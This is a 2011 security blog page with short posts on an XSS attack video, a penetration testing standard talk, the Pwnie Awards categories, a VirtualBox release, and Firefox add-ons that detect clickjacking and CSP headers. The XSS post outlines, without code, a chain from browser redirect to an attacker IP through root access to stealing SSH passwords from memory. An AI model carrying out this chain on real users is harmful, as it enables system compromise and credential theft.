... neuere Einträge
Monday, 25. July 2011
Xss Attack
Am Monday, 25. Jul 2011 im Topic 'Tutorials'
This video will demonstrate how a simple XSS vulnerability can be leveraged to gain complete control of your web-browser and eventually lead to a complete system compromise.
1) We will use a cross-site scripting vulnerability as the initial attack vector
2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs)
3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access
4) Elevate our privileges to system-level
5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer
1) We will use a cross-site scripting vulnerability as the initial attack vector
2) Exploit XSS by redirecting the user’s browser to the Evil_IP with a JavaScript loop (every 2 secs)
3) Exploit the victim’s browser to gain system ‘root’ or ‘shell’ access
4) Elevate our privileges to system-level
5) Dump the memory contents from an active SSH session and steal the SSH password from the victim’s computer
Hacking a security program
Am Monday, 25. Jul 2011 im Topic 'Tutorials'
This article is a video demonstration about Penetration Testing Execution Standard. David goes in-depth on the future of penetration testing through the Penetration Testing Execution Standard (PTES) and what it takes in order to elevate your security posture.
Video is all about technical talk which offers direction on where we need to head in the security industry. We know many of us like to create our own path. But known strategies will not harm.
Video is all about technical talk which offers direction on where we need to head in the security industry. We know many of us like to create our own path. But known strategies will not harm.
LulzSec, Anonymous and Stuxnet Nominated for Pwnie Awards 2011
Am Monday, 25. Jul 2011 im Topic 'News'
Award categories
In 2011 there will be nine award categories:
Pwnie for Best Server-Side Bug
Pwnie for Best Client-Side Bug
Pwnie for Best Privilege Escalation Bug
Pwnie for Most Innovative Research
Pwnie for Lamest Vendor Response
Pwnie for Best Song
Pwnie for Most Epic FAIL
Pwnie for Lifetime Achievement
Pwnie for Epic Ownage
You Can Read All The Nominations here
http://pwnies.com/nominations/
In 2011 there will be nine award categories:
Pwnie for Best Server-Side Bug
Pwnie for Best Client-Side Bug
Pwnie for Best Privilege Escalation Bug
Pwnie for Most Innovative Research
Pwnie for Lamest Vendor Response
Pwnie for Best Song
Pwnie for Most Epic FAIL
Pwnie for Lifetime Achievement
Pwnie for Epic Ownage
You Can Read All The Nominations here
http://pwnies.com/nominations/
VirtualBox 4.1 Final - for Linux
Am Monday, 25. Jul 2011 im Topic 'Tools'
VirtualBox is a general-purpose full virtualizer for x86 hardware, targeted at server, desktop and embedded use.
This version is a major update.
Download
http://www.virtualbox.org/wiki/Downloads
This version is a major update.
Download
http://www.virtualbox.org/wiki/Downloads
Clickjacking Defense - Declarative Sec Detector
Am Monday, 25. Jul 2011 im Topic 'Pentest'
The X-FRAME-OPTIONS sets a restriction on the framing of a web page for a particular domain. It uses the value DENY and SAMEORIGIN for rendering the contents into a child frame.It is possible to stop the rendering completely in a child frame using DENY as a parameter. The SAMEORIGIN parameter declares that the content can only come
from the parent site and that no third party content rendering is allowed.This addon scans all the HTTP response headers that accompany with the web page and raises a notification in the status bar showing whether the declarative security for Clickjacking is applied on the respective domain or not.
Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/clickjacking-defense-declar/
from the parent site and that no third party content rendering is allowed.This addon scans all the HTTP response headers that accompany with the web page and raises a notification in the status bar showing whether the declarative security for Clickjacking is applied on the respective domain or not.
Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/clickjacking-defense-declar/
HTTP Content Security Policy Detector
Am Monday, 25. Jul 2011 im Topic 'Pentest'
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP is designed to be fully backward compatible; browsers that don't support it still work with servers that implement it, and vice-versa. Browsers that don't support CSP simply ignore it, functioning as usual, defaulting to the standard same-origin policy for web content.
Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/http-content-security-polic/
Download - Firefox Addon
https://addons.mozilla.org/en-US/firefox/addon/http-content-security-polic/
... ältere Einträge